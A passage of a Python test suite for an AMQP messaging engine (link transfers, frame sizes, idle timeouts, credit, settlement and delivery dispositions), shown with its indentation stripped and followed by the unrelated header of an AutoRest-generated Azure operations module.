terminus.dynamic = True
if self.dist_mode is not None:
terminus.distribution_mode = self.dist_mode
class TransferTest(Test):
def setup(self):
self.snd, self.rcv = self.link("test-link")
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
def teardown(self):
self.cleanup()
def test_work_queue(self):
assert self.c1.work_head is None
self.snd.delivery("tag")
assert self.c1.work_head is None
self.rcv.flow(1)
self.pump()
d = self.c1.work_head
assert d is not None
tag = d.tag
assert tag == "tag", tag
assert d.writable
n = self.snd.send("this is a test")
assert self.snd.advance()
assert self.c1.work_head is None
self.pump()
d = self.c2.work_head
assert d.tag == "tag"
assert d.readable
def test_multiframe(self):
self.rcv.flow(1)
self.snd.delivery("tag")
msg = "this is a test"
n = self.snd.send(msg)
assert n == len(msg)
self.pump()
d = self.rcv.current
assert d
assert d.tag == "tag", repr(d.tag)
assert d.readable
bytes = self.rcv.recv(1024)
assert bytes == msg
bytes = self.rcv.recv(1024)
assert bytes == ""
msg = "this is more"
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump()
bytes = self.rcv.recv(1024)
assert bytes == msg, (bytes, msg)
bytes = self.rcv.recv(1024)
assert bytes is None
def test_disposition(self):
self.rcv.flow(1)
self.pump()
sd = self.snd.delivery("tag")
msg = "this is a test"
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump()
rd = self.rcv.current
assert rd is not None
assert rd.tag == sd.tag
rmsg = self.rcv.recv(1024)
assert rmsg == msg
rd.update(Delivery.ACCEPTED)
self.pump()
rdisp = sd.remote_state
ldisp = rd.local_state
assert rdisp == ldisp == Delivery.ACCEPTED, (rdisp, ldisp)
assert sd.updated
sd.update(Delivery.ACCEPTED)
sd.settle()
self.pump()
assert sd.local_state == rd.remote_state == Delivery.ACCEPTED
def test_delivery_id_ordering(self):
self.rcv.flow(1024)
self.pump(buffer_size=64*1024)
#fill up delivery buffer on sender
for m in range(1024):
sd = self.snd.delivery("tag%s" % m)
msg = "message %s" % m
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump(buffer_size=64*1024)
#receive a session-windows worth of messages and accept them
for m in range(1024):
rd = self.rcv.current
assert rd is not None, m
assert rd.tag == ("tag%s" % m), (rd.tag, m)
msg = self.rcv.recv(1024)
assert msg == ("message %s" % m), (msg, m)
rd.update(Delivery.ACCEPTED)
rd.settle()
self.pump(buffer_size=64*1024)
#add some new deliveries
for m in range(1024, 1450):
sd = self.snd.delivery("tag%s" % m)
msg = "message %s" % m
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
#handle all disposition changes to sent messages
d = self.c1.work_head
while d:
if d.updated:
d.update(Delivery.ACCEPTED)
d.settle()
d = d.work_next
#submit some more deliveries
for m in range(1450, 1500):
sd = self.snd.delivery("tag%s" % m)
msg = "message %s" % m
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump(buffer_size=64*1024)
self.rcv.flow(1024)
self.pump(buffer_size=64*1024)
#verify remaining messages can be received and accepted
for m in range(1024, 1500):
rd = self.rcv.current
assert rd is not None, m
assert rd.tag == ("tag%s" % m), (rd.tag, m)
msg = self.rcv.recv(1024)
assert msg == ("message %s" % m), (msg, m)
rd.update(Delivery.ACCEPTED)
rd.settle()
class MaxFrameTransferTest(Test):
def setup(self):
pass
def teardown(self):
self.cleanup()
def message(self, size):
parts = []
for i in range(size):
parts.append(str(i))
return "/".join(parts)[:size]
def testMinFrame(self):
"""
Configure receiver to support minimum max-frame as defined by AMQP-1.0.
Verify transfer of messages larger than 512.
"""
self.snd, self.rcv = self.link("test-link", max_frame=[0,512])
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
assert self.rcv.session.connection._transport.max_frame_size == 512
assert self.snd.session.connection._transport.remote_max_frame_size == 512
self.rcv.flow(1)
self.snd.delivery("tag")
msg = self.message(513)
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump()
bytes = self.rcv.recv(513)
assert bytes == msg
bytes = self.rcv.recv(1024)
assert bytes == None
def testOddFrame(self):
"""
Test an odd sized max limit with data that will require multiple frames to
be transfered.
"""
self.snd, self.rcv = self.link("test-link", max_frame=[0,521])
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
assert self.rcv.session.connection._transport.max_frame_size == 521
assert self.snd.session.connection._transport.remote_max_frame_size == 521
self.rcv.flow(2)
self.snd.delivery("tag")
msg = "X" * 1699
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump()
bytes = self.rcv.recv(1699)
assert bytes == msg
bytes = self.rcv.recv(1024)
assert bytes == None
self.rcv.advance()
self.snd.delivery("gat")
msg = self.message(1426)
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump()
bytes = self.rcv.recv(1426)
assert bytes == msg
self.pump()
bytes = self.rcv.recv(1024)
assert bytes == None
def testBigMessage(self):
"""
Test transfering a big message.
"""
self.snd, self.rcv = self.link("test-link")
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
self.rcv.flow(2)
self.snd.delivery("tag")
msg = self.message(1024*256)
n = self.snd.send(msg)
assert n == len(msg)
assert self.snd.advance()
self.pump()
bytes = self.rcv.recv(1024*256)
assert bytes == msg
bytes = self.rcv.recv(1024)
assert bytes == None
class IdleTimeoutTest(Test):
def setup(self):
pass
def teardown(self):
self.cleanup()
def message(self, size):
parts = []
for i in range(size):
parts.append(str(i))
return "/".join(parts)[:size]
def testGetSet(self):
"""
Verify the configuration and negotiation of the idle timeout.
"""
self.snd, self.rcv = self.link("test-link", idle_timeout=[1.0,2.0])
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
assert self.rcv.session.connection._transport.idle_timeout == 2.0
assert self.rcv.session.connection._transport.remote_idle_timeout == 1.0
assert self.snd.session.connection._transport.idle_timeout == 1.0
assert self.snd.session.connection._transport.remote_idle_timeout == 2.0
def testTimeout(self):
"""
Verify the AMQP Connection idle timeout.
"""
# snd will timeout the Connection if no frame is received within 1000 ticks
self.snd, self.rcv = self.link("test-link", idle_timeout=[1.0,0])
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
t_snd = self.snd.session.connection._transport
t_rcv = self.rcv.session.connection._transport
assert t_rcv.idle_timeout == 0.0
assert t_rcv.remote_idle_timeout == 1.0
assert t_snd.idle_timeout == 1.0
assert t_snd.remote_idle_timeout == 0.0
sndr_frames_in = t_snd.frames_input
rcvr_frames_out = t_rcv.frames_output
# at t+1msec, nothing should happen:
clock = 0.001
assert t_snd.tick(clock) == 1.001, "deadline for remote timeout"
assert t_rcv.tick(clock) == 0.501, "deadline to send keepalive"
self.pump()
assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
# at one tick from expected idle frame send, nothing should happen:
clock = 0.500
assert t_snd.tick(clock) == 1.001, "deadline for remote timeout"
assert t_rcv.tick(clock) == 0.501, "deadline to send keepalive"
self.pump()
assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
# this should cause rcvr to expire and send a keepalive
clock = 0.502
assert t_snd.tick(clock) == 1.001, "deadline for remote timeout"
assert t_rcv.tick(clock) == 1.002, "deadline to send keepalive"
self.pump()
sndr_frames_in += 1
rcvr_frames_out += 1
assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
assert rcvr_frames_out == t_rcv.frames_output, "unexpected frame"
# since a keepalive was received, sndr will rebase its clock against this tick:
# and the receiver should not change its deadline
clock = 0.503
assert t_snd.tick(clock) == 1.503, "deadline for remote timeout"
assert t_rcv.tick(clock) == 1.002, "deadline to send keepalive"
self.pump()
assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
# now expire sndr
clock = 1.504
t_snd.tick(clock)
try:
self.pump()
assert False, "Expected connection timeout did not happen!"
except TransportException:
pass
class CreditTest(Test):
def setup(self):
self.snd, self.rcv = self.link("test-link", max_frame=(16*1024, 16*1024))
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
def teardown(self):
self.cleanup()
def testCreditSender(self, count=1024):
credit = self.snd.credit
assert credit == 0, credit
self.rcv.flow(10)
self.pump()
credit = self.snd.credit
assert credit == 10, credit
self.rcv.flow(count)
self.pump()
credit = self.snd.credit
assert credit == 10 + count, credit
def testCreditReceiver(self):
self.rcv.flow(10)
self.pump()
assert self.rcv.credit == 10, self.rcv.credit
d = self.snd.delivery("tag")
assert d
assert self.snd.advance()
self.pump()
assert self.rcv.credit == 10, self.rcv.credit
assert self.rcv.queued == 1, self.rcv.queued
c = self.rcv.current
assert c.tag == "tag", c.tag
assert self.rcv.advance()
assert self.rcv.credit == 9, self.rcv.credit
assert self.rcv.queued == 0, self.rcv.queued
def _testBufferingOnClose(self, a, b):
for i in range(10):
d = self.snd.delivery("tag-%s" % i)
assert d
d.settle()
self.pump()
assert self.snd.queued == 10
endpoints = {"connection": (self.c1, self.c2),
"session": (self.snd.session, self.rcv.session),
"link": (self.snd, self.rcv)}
local_a, remote_a = endpoints[a]
local_b, remote_b = endpoints[b]
remote_b.close()
self.pump()
assert local_b.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
local_a.close()
self.pump()
assert remote_a.state & Endpoint.REMOTE_CLOSED
assert self.snd.queued == 10
def testBufferingOnCloseLinkLink(self):
self._testBufferingOnClose("link", "link")
def testBufferingOnCloseLinkSession(self):
self._testBufferingOnClose("link", "session")
def testBufferingOnCloseLinkConnection(self):
self._testBufferingOnClose("link", "connection")
def testBufferingOnCloseSessionLink(self):
self._testBufferingOnClose("session", "link")
def testBufferingOnCloseSessionSession(self):
self._testBufferingOnClose("session", "session")
def testBufferingOnCloseSessionConnection(self):
self._testBufferingOnClose("session", "connection")
def testBufferingOnCloseConnectionLink(self):
self._testBufferingOnClose("connection", "link")
def testBufferingOnCloseConnectionSession(self):
self._testBufferingOnClose("connection", "session")
def testBufferingOnCloseConnectionConnection(self):
self._testBufferingOnClose("connection", "connection")
def testFullDrain(self):
assert self.rcv.credit == 0
assert self.snd.credit == 0
self.rcv.drain(10)
assert self.rcv.draining()
assert self.rcv.credit == 10
assert self.snd.credit == 0
self.pump()
assert self.rcv.credit == 10
assert self.snd.credit == 10
assert self.rcv.draining()
self.snd.drained()
assert self.rcv.credit == 10
assert self.snd.credit == 0
assert self.rcv.draining()
self.pump()
assert self.rcv.credit == 0
assert self.snd.credit == 0
assert not self.rcv.draining()
drained = self.rcv.drained()
assert drained == 10, drained
def testPartialDrain(self):
self.rcv.drain(2)
assert self.rcv.draining()
self.pump()
d = self.snd.delivery("tag")
assert d
assert self.snd.advance()
self.snd.drained()
assert self.rcv.draining()
self.pump()
assert not self.rcv.draining()
c = self.rcv.current
assert self.rcv.queued == 1, self.rcv.queued
assert c.tag == d.tag, c.tag
assert self.rcv.advance()
assert not self.rcv.current
assert self.rcv.credit == 0, self.rcv.credit
assert not self.rcv.draining()
drained = self.rcv.drained()
assert drained == 1, drained
def testDrainFlow(self):
assert self.rcv.credit == 0
assert self.snd.credit == 0
self.rcv.drain(10)
assert self.rcv.credit == 10
assert self.snd.credit == 0
self.pump()
assert self.rcv.credit == 10
assert self.snd.credit == 10
self.snd.drained()
assert self.rcv.credit == 10
assert self.snd.credit == 0
self.pump()
assert self.rcv.credit == 0
assert self.snd.credit == 0
self.rcv.flow(10)
assert self.rcv.credit == 10
assert self.snd.credit == 0
self.pump()
assert self.rcv.credit == 10
assert self.snd.credit == 10
self.snd.drained()
assert self.rcv.credit == 10
assert self.snd.credit == 10
self.pump()
assert self.rcv.credit == 10
assert self.snd.credit == 10
drained = self.rcv.drained()
assert drained == 10, drained
def testNegative(self):
assert self.snd.credit == 0
d = self.snd.delivery("tag")
assert d
assert self.snd.advance()
self.pump()
assert self.rcv.credit == 0
assert self.rcv.queued == 0
self.rcv.flow(1)
assert self.rcv.credit == 1
assert self.rcv.queued == 0
self.pump()
assert self.rcv.credit == 1
assert self.rcv.queued == 1, self.rcv.queued
c = self.rcv.current
assert c
assert c.tag == "tag"
assert self.rcv.advance()
assert self.rcv.credit == 0
assert self.rcv.queued == 0
def testDrainZero(self):
assert self.snd.credit == 0
assert self.rcv.credit == 0
assert self.rcv.queued == 0
drained = self.rcv.drained()
assert drained == 0
self.rcv.flow(10)
self.pump()
assert self.snd.credit == 10
assert self.rcv.credit == 10
assert self.rcv.queued == 0
self.snd.drained()
self.pump()
assert self.snd.credit == 10
assert self.rcv.credit == 10
assert self.rcv.queued == 0
drained = self.rcv.drained()
assert drained == 0
self.rcv.drain(0)
assert self.snd.credit == 10
assert self.rcv.credit == 10
assert self.rcv.queued == 0
self.pump()
assert self.snd.credit == 10
assert self.rcv.credit == 10
assert self.rcv.queued == 0
self.snd.drained()
assert self.snd.credit == 0
assert self.rcv.credit == 10
assert self.rcv.queued == 0
drained = self.rcv.drained()
assert drained == 0
self.pump()
assert self.snd.credit == 0
assert self.rcv.credit == 0
assert self.rcv.queued == 0
drained = self.rcv.drained()
assert drained == 10
def testDrainOrder(self):
""" Verify drain/drained works regardless of ordering. See PROTON-401
"""
assert self.snd.credit == 0
assert self.rcv.credit == 0
assert self.rcv.queued == 0
#self.rcv.session.connection._transport.trace(Transport.TRACE_FRM)
#self.snd.session.connection._transport.trace(Transport.TRACE_FRM)
## verify that a sender that has reached the drain state will respond
## promptly to a drain issued by the peer.
self.rcv.flow(10)
self.pump()
assert self.snd.credit == 10, self.snd.credit
assert self.rcv.credit == 10, self.rcv.credit
sd = self.snd.delivery("tagA")
assert sd
n = self.snd.send("A")
assert n == 1
self.pump()
self.snd.advance()
# done sending, so signal that we are drained:
self.snd.drained()
self.pump()
assert self.snd.credit == 9, self.snd.credit
assert self.rcv.credit == 10, self.rcv.credit
self.rcv.drain(0)
self.pump()
assert self.snd.credit == 9, self.snd.credit
assert self.rcv.credit == 10, self.rcv.credit
bytes = self.rcv.recv(10)
assert bytes == "A", bytes
self.rcv.advance()
self.pump()
assert self.snd.credit == 9, self.snd.credit
assert self.rcv.credit == 9, self.rcv.credit
self.snd.drained()
self.pump()
assert self.snd.credit == 0, self.snd.credit
assert self.rcv.credit == 0, self.rcv.credit
# verify that a drain requested by the peer is not "acknowledged" until
# after the sender has completed sending its pending messages
self.rcv.flow(10)
self.pump()
assert self.snd.credit == 10, self.snd.credit
assert self.rcv.credit == 10, self.rcv.credit
sd = self.snd.delivery("tagB")
assert sd
n = self.snd.send("B")
assert n == 1
self.snd.advance()
self.pump()
assert self.snd.credit == 9, self.snd.credit
assert self.rcv.credit == 10, self.rcv.credit
self.rcv.drain(0)
self.pump()
assert self.snd.credit == 9, self.snd.credit
assert self.rcv.credit == 10, self.rcv.credit
sd = self.snd.delivery("tagC")
assert sd
n = self.snd.send("C")
assert n == 1
self.snd.advance()
self.pump()
assert self.snd.credit == 8, self.snd.credit
assert self.rcv.credit == 10, self.rcv.credit
# now that the sender has finished sending everything, it can signal
# drained
self.snd.drained()
self.pump()
assert self.snd.credit == 0, self.snd.credit
assert self.rcv.credit == 2, self.rcv.credit
bytes = self.rcv.recv(10)
assert bytes == "B", bytes
self.rcv.advance()
bytes = self.rcv.recv(10)
assert bytes == "C", bytes
self.rcv.advance()
self.pump()
assert self.snd.credit == 0, self.snd.credit
assert self.rcv.credit == 0, self.rcv.credit
def testPushback(self, count=10):
assert self.snd.credit == 0
assert self.rcv.credit == 0
self.rcv.flow(count)
self.pump()
for i in range(count):
d = self.snd.delivery("tag%s" % i)
assert d
self.snd.advance()
assert self.snd.queued == count
assert self.rcv.queued == 0
self.pump()
assert self.snd.queued == 0
assert self.rcv.queued == count
d = self.snd.delivery("extra")
self.snd.advance()
assert self.snd.queued == 1
assert self.rcv.queued == count
self.pump()
assert self.snd.queued == 1
assert self.rcv.queued == count
def testHeadOfLineBlocking(self):
self.snd2 = self.snd.session.sender("link-2")
self.rcv2 = self.rcv.session.receiver("link-2")
self.snd2.open()
self.rcv2.open()
self.pump()
assert self.snd2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
assert self.rcv2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
self.rcv.flow(5)
self.rcv2.flow(10)
self.pump()
assert self.snd.credit == 5
assert self.snd2.credit == 10
for i in range(10):
tag = "test %d" % i
self.snd.delivery( tag )
self.snd.send( tag )
assert self.snd.advance()
self.snd2.delivery( tag )
self.snd2.send( tag )
assert self.snd2.advance()
self.pump()
for i in range(5):
b = self.rcv.recv( 512 )
assert self.rcv.advance()
b = self.rcv2.recv( 512 )
assert self.rcv2.advance()
for i in range(5):
b = self.rcv2.recv( 512 )
assert self.rcv2.advance()
class SessionCreditTest(Test):
def teardown(self):
self.cleanup()
def testBuffering(self, count=32, size=1024, capacity=16*1024, max_frame=1024):
snd, rcv = self.link("test-link", max_frame=(max_frame, max_frame))
rcv.session.incoming_capacity = capacity
snd.open()
rcv.open()
rcv.flow(count)
self.pump()
assert count > 0
total_bytes = count * size
assert snd.session.outgoing_bytes == 0, snd.session.outgoing_bytes
assert rcv.session.incoming_bytes == 0, rcv.session.incoming_bytes
assert snd.queued == 0, snd.queued
assert rcv.queued == 0, rcv.queued
idx = 0
while snd.credit:
d = snd.delivery("tag%s" % idx)
assert d
n = snd.send(chr(ord("a") + idx)*size)
assert n == size, (n, size)
assert snd.advance()
self.pump()
idx += 1
assert idx == count, (idx, count)
assert snd.session.outgoing_bytes < total_bytes, (snd.session.outgoing_bytes, total_bytes)
assert rcv.session.incoming_bytes < capacity, (rcv.session.incoming_bytes, capacity)
assert snd.session.outgoing_bytes + rcv.session.incoming_bytes == total_bytes, \
(snd.session.outgoing_bytes, rcv.session.incoming_bytes, total_bytes)
if snd.session.outgoing_bytes > 0:
available = rcv.session.incoming_capacity - rcv.session.incoming_bytes
assert available < max_frame, (available, max_frame)
for i in range(count):
d = rcv.current
assert d, i
pending = d.pending
before = rcv.session.incoming_bytes
assert rcv.advance()
after = rcv.session.incoming_bytes
assert before - after == pending, (before, after, pending)
snd_before = snd.session.incoming_bytes
self.pump()
snd_after = snd.session.incoming_bytes
assert rcv.session.incoming_bytes < capacity
if snd_before > 0:
assert capacity - after <= max_frame
assert snd_before > snd_after
if snd_after > 0:
available = rcv.session.incoming_capacity - rcv.session.incoming_bytes
assert available < max_frame, available
def testBufferingSize16(self):
self.testBuffering(size=16)
def testBufferingSize256(self):
self.testBuffering(size=256)
def testBufferingSize512(self):
self.testBuffering(size=512)
def testBufferingSize2048(self):
self.testBuffering(size=2048)
def testBufferingSize1025(self):
self.testBuffering(size=1025)
def testBufferingSize1023(self):
self.testBuffering(size=1023)
def testBufferingSize989(self):
self.testBuffering(size=989)
def testBufferingSize1059(self):
self.testBuffering(size=1059)
def testCreditWithBuffering(self):
snd, rcv = self.link("test-link", max_frame=(1024, 1024))
rcv.session.incoming_capacity = 64*1024
snd.open()
rcv.open()
rcv.flow(128)
self.pump()
assert snd.credit == 128, snd.credit
assert rcv.queued == 0, rcv.queued
idx = 0
while snd.credit:
d = snd.delivery("tag%s" % idx)
snd.send("x"*1024)
assert d
assert snd.advance()
self.pump()
idx += 1
assert idx == 128, idx
assert rcv.queued < 128, rcv.queued
rcv.flow(1)
self.pump()
assert snd.credit == 1, snd.credit
class SettlementTest(Test):
def setup(self):
self.snd, self.rcv = self.link("test-link")
self.c1 = self.snd.session.connection
self.c2 = self.rcv.session.connection
self.snd.open()
self.rcv.open()
self.pump()
def teardown(self):
self.cleanup()
def testSettleCurrent(self):
self.rcv.flow(10)
self.pump()
assert self.snd.credit == 10, self.snd.credit
d = self.snd.delivery("tag")
e = self.snd.delivery("tag2")
assert d
assert e
c = self.snd.current
assert c.tag == "tag", c.tag
c.settle()
c = self.snd.current
assert c.tag == "tag2", c.tag
c.settle()
c = self.snd.current
assert not c
self.pump()
c = self.rcv.current
assert c
assert c.tag == "tag", c.tag
assert c.settled
c.settle()
c = self.rcv.current
assert c
assert c.tag == "tag2", c.tag
assert c.settled
c.settle()
c = self.rcv.current
assert not c
def testUnsettled(self):
self.rcv.flow(10)
self.pump()
assert self.snd.unsettled == 0, self.snd.unsettled
assert self.rcv.unsettled == 0, self.rcv.unsettled
d = self.snd.delivery("tag")
assert d
assert self.snd.unsettled == 1, self.snd.unsettled
assert self.rcv.unsettled == 0, self.rcv.unsettled
assert self.snd.advance()
self.pump()
assert self.snd.unsettled == 1, self.snd.unsettled
assert self.rcv.unsettled == 1, self.rcv.unsettled
c = self.rcv.current
assert c
c.settle()
assert self.snd.unsettled == 1, self.snd.unsettled
assert self.rcv.unsettled == 0, self.rcv.unsettled
def testMultipleUnsettled(self, count=1024, size=1024):
self.rcv.flow(count)
self.pump()
assert self.snd.unsettled == 0, self.snd.unsettled
assert self.rcv.unsettled == 0, self.rcv.unsettled
unsettled = []
for i in range(count):
sd = self.snd.delivery("tag%s" % i)
assert sd
n = self.snd.send("x"*size)
assert n == size, n
assert self.snd.advance()
self.pump()
rd = self.rcv.current
assert rd, "did not receive delivery %s" % i
n = rd.pending
b = self.rcv.recv(n)
assert len(b) == n, (b, n)
rd.update(Delivery.ACCEPTED)
assert self.rcv.advance()
self.pump()
unsettled.append(rd)
assert self.rcv.unsettled == count
for rd in unsettled:
rd.settle()
def testMultipleUnsettled2K1K(self):
self.testMultipleUnsettled(2048, 1024)
def testMultipleUnsettled4K1K(self):
self.testMultipleUnsettled(4096, 1024)
def testMultipleUnsettled1K2K(self):
self.testMultipleUnsettled(1024, 2048)
def testMultipleUnsettled2K2K(self):
self.testMultipleUnsettled(2048, 2048)
def testMultipleUnsettled4K2K(self):
self.testMultipleUnsettled(4096, 2048)
class PipelineTest(Test):
def setup(self):
self.c1, self.c2 = self.connection()
def teardown(self):
self.cleanup()
def test(self):
ssn = self.c1.session()
snd = ssn.sender("sender")
self.c1.open()
ssn.open()
snd.open()
for i in range(10):
d = snd.delivery("delivery-%s" % i)
snd.send("delivery-%s" % i)
d.settle()
snd.close()
ssn.close()
self.c1.close()
self.pump()
state = self.c2.state
assert state == (Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE), "%x" % state
ssn2 = self.c2.session_head(Endpoint.LOCAL_UNINIT)
assert ssn2
state == ssn2.state
assert state == (Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE), "%x" % state
rcv = self.c2.link_head(Endpoint.LOCAL_UNINIT)
assert rcv
state = rcv.state
assert state == (Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE), "%x" % state
self.c2.open()
ssn2.open()
rcv.open()
rcv.flow(10)
assert rcv.queued == 0, rcv.queued
self.pump()
assert rcv.queued == 10, rcv.queued
state = rcv.state
assert state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED), "%x" % state
state = ssn2.state
assert state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED), "%x" % state
state = self.c2.state
assert state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED), "%x" % state
for i in range(rcv.queued):
d = rcv.current
assert d
assert d.tag == "delivery-%s" % i
d.settle()
assert rcv.queued == 0, rcv.queued
class ServerTest(Test):
def testKeepalive(self):
""" Verify that idle frames are sent to keep a Connection alive
"""
idle_timeout_secs = self.delay
self.server = common.TestServerDrain()
self.server.start()
self.driver = Driver()
self.cxtr = self.driver.connector(self.server.host, self.server.port)
self.cxtr.transport.idle_timeout = idle_timeout_secs
self.cxtr.sasl().mechanisms("ANONYMOUS")
self.cxtr.sasl().client()
self.conn = Connection()
self.cxtr.connection = self.conn
self.conn.open()
#self.session = self.conn.session()
#self.session.open()
#self.link = self.session.sender("test-sender")
#self.link.open()
# wait for the connection to come up
deadline = time() + self.timeout
while self.conn.state != (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE) \
and time() <= deadline:
self.cxtr.process()
self.driver.wait(0.001)
self.cxtr.process()
assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection failed"
# wait up to 3x the idle timeout
old_count = self.cxtr.transport.frames_input
duration = 3 * idle_timeout_secs
deadline = time() + duration
while time() <= deadline:
self.cxtr.process()
self.driver.wait(0.001)
self.cxtr.process()
assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection terminated"
assert self.cxtr.transport.frames_input > old_count, "No idle frames received"
self.server.stop()
def testIdleTimeout(self):
""" Verify that a Connection is terminated properly when Idle frames do not
arrive in a timely manner.
"""
idle_timeout_secs = self.delay
self.server = common.TestServerDrain(idle_timeout=idle_timeout_secs)
self.server.start()
self.driver = Driver()
self.cxtr = self.driver.connector(self.server.host, self.server.port)
self.cxtr.sasl().mechanisms("ANONYMOUS")
self.cxtr.sasl().client()
self.conn = Connection()
self.cxtr.connection = self.conn
self.conn.open()
# wait for the connection to come up
deadline = time() + self.timeout
while self.conn.state != (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE) \
and time() <= deadline:
self.cxtr.process()
self.driver.wait(self.timeout)
self.cxtr.process()
assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection failed"
# verify the connection stays up even if we don't explicitly send stuff
# wait up to 3x the idle timeout
old_count = self.cxtr.transport.frames_output
duration = 3 * idle_timeout_secs
deadline = time() + duration
while time() <= deadline:
self.cxtr.process()
self.driver.wait(10 * duration)
self.cxtr.process()
assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection terminated"
assert self.cxtr.transport.frames_output > old_count, "No idle frames sent"
# now wait to explicitly cause the other side to expire:
sleep(idle_timeout_secs * 3)
# and check that the remote killed the connection:
deadline = time() + self.timeout
while (self.conn.state & Endpoint.REMOTE_ACTIVE) and time() <= deadline:
self.cxtr.process()
self.driver.wait(self.timeout)
self.cxtr.process()
assert self.conn.state & Endpoint.REMOTE_CLOSED, "Connection failed to close"
self.server.stop()
class NoValue:
def __init__(self):
pass
def apply(self, dlv):
pass
def check(self, dlv):
assert dlv.data == None
assert dlv.section_number == 0
assert dlv.section_offset == 0
assert dlv.condition == None
assert dlv.failed == False
assert dlv.undeliverable == False
assert dlv.annotations == None
class RejectValue:
def __init__(self, condition):
self.condition = condition
def apply(self, dlv):
dlv.condition = self.condition
def check(self, dlv):
assert dlv.data == None, dlv.data
assert dlv.section_number == 0
assert dlv.section_offset == 0
assert dlv.condition == self.condition, (dlv.condition, self.condition)
assert dlv.failed == False
assert dlv.undeliverable == False
assert dlv.annotations == None
class ReceivedValue:
def __init__(self, section_number, section_offset):
self.section_number = section_number
self.section_offset = section_offset
def apply(self, dlv):
dlv.section_number = self.section_number
dlv.section_offset = self.section_offset
def check(self, dlv):
assert dlv.data == None, dlv.data
assert dlv.section_number == self.section_number, (dlv.section_number, self.section_number)
assert dlv.section_offset == self.section_offset
assert dlv.condition == None
assert dlv.failed == False
assert dlv.undeliverable == False
assert dlv.annotations == None
class ModifiedValue:
def __init__(self, failed, undeliverable, annotations):
self.failed = failed
self.undeliverable = undeliverable
self.annotations = annotations
def apply(self, dlv):
dlv.failed = self.failed
dlv.undeliverable = self.undeliverable
dlv.annotations = self.annotations
def check(self, dlv):
assert dlv.data == None, dlv.data
assert dlv.section_number == 0
assert dlv.section_offset == 0
assert dlv.condition == None
assert dlv.failed == self.failed
assert dlv.undeliverable == self.undeliverable
assert dlv.annotations == self.annotations, (dlv.annotations, self.annotations)
class CustomValue:
def __init__(self, data):
self.data = data
def apply(self, dlv):
dlv.data = self.data
def check(self, dlv):
assert dlv.data == self.data, (dlv.data, self.data)
assert dlv.section_number == 0
assert dlv.section_offset == 0
assert dlv.condition == None
assert dlv.failed == False
assert dlv.undeliverable == False
assert dlv.annotations == None
class DeliveryTest(Test):
def teardown(self):
self.cleanup()
def testDisposition(self, count=1, tag="tag%i", type=Delivery.ACCEPTED, value=NoValue()):
snd, rcv = self.link("test-link")
snd.open()
rcv.open()
snd_deliveries = []
for i in range(count):
d = snd.delivery(tag % i)
snd_deliveries.append(d)
snd.advance()
rcv.flow(count)
self.pump()
rcv_deliveries = []
for i in range(count):
d = rcv.current
assert d.tag == (tag % i)
rcv_deliveries.append(d)
rcv.advance()
for d in rcv_deliveries:
value.apply(d.local)
d.update(type)
self.pump()
for d in snd_deliveries:
assert d.remote_state == type
assert d.remote.type == type
value.check(d.remote)
value.apply(d.local)
d.update(type)
self.pump()
for d in rcv_deliveries:
assert d.remote_state == type
assert d.remote.type == type
value.check(d.remote)
for d in snd_deliveries:
d.settle()
self.pump()
for d in rcv_deliveries:
assert d.settled, d.settled
d.settle()
def testReceived(self):
self.testDisposition(type=Disposition.RECEIVED, value=ReceivedValue(1, 2))
def testRejected(self):
self.testDisposition(type=Disposition.REJECTED, value=RejectValue(Condition(symbol("foo"))))
def testReleased(self):
self.testDisposition(type=Disposition.RELEASED)
def testModified(self):
self.testDisposition(type=Disposition.MODIFIED,
value=ModifiedValue(failed=True, undeliverable=True,
annotations={"key": "value"}))
def testCustom(self):
self.testDisposition(type=0x12345, value=CustomValue([1, 2, 3]))
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._application_gateways_operations import ApplicationGatewaysOperations
